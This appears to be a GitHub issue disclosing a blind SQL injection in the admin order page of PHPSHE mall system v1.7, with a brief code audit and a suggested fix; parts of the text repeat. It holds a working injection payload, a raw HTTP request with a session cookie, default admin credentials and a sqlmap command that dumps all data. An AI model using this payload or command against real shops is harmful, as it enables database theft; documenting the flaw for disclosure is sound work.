You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Parameter: state (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: mod=order&state=wtuan' AND 3809=(SELECT (CASE WHEN (3809=3809) THEN 3809 ELSE (SELECT 6050 UNION SELECT 8971) END))-- LULI
GET /phpshe1.7/admin.php?mod=order&state=wtuan HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=XDEBUG_ECLIPSE; PHPSESSID=f29hn1a9eo2g3o2qcdq1241hf0
Upgrade-Insecure-Requests: 1
Vulnerability identification The solution
Background avoid parameter splicing.
Code audit:
Local environment. GET /phpshe1.7/admin.php?mod=order&state=wtuan
The admin.php line 87 execution flow introduces the order.php line 220 pe_selectall function to count the order list.
The pe_selectall function is defined on line 208 of db.class.php.
The Pe_selectall function handles conditional statements through the _dowhere function,The sql_selectall function displays the number of transactions per page.The malicious SQL is spliced in the _dowhere function.Last injection successful.
The text was updated successfully, but these errors were encountered:
Vulnerability description
Test object:
(1) website: PHPSHE shopping system V1.7
(2) the website domain name: http://www.phpshe.com/
(3) IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Detection time:
January 6, 2019
Vulnerability description:
Lingbao Jianhao network technology co., LTD. PHPSHE cms system background - SQL injection vulnerability.
POC and validation
Local setup environment:
1, download PHPSHE V1.7 cms system at http://www.phpshe.com/down/phpshe1.7.rar
2, the background to http://localhost/phpshe1.7/admin.php, the password is admin/admin
Vulnerability injection point:
Vulnerability verification method:
python sqlmap.py -r 22.txt --batch -o --dbms=mysql --level 3 -a
22. TXT file contents:
Vulnerability identification
The solution
Background avoid parameter splicing.
Code audit:
Local environment.
GET /phpshe1.7/admin.php?mod=order&state=wtuan
The admin.php line 87 execution flow introduces the order.php line 220 pe_selectall function to count the order list.
The pe_selectall function is defined on line 208 of db.class.php.
The Pe_selectall function handles conditional statements through the _dowhere function,The sql_selectall function displays the number of transactions per page.The malicious SQL is spliced in the _dowhere function.Last injection successful.
The text was updated successfully, but these errors were encountered: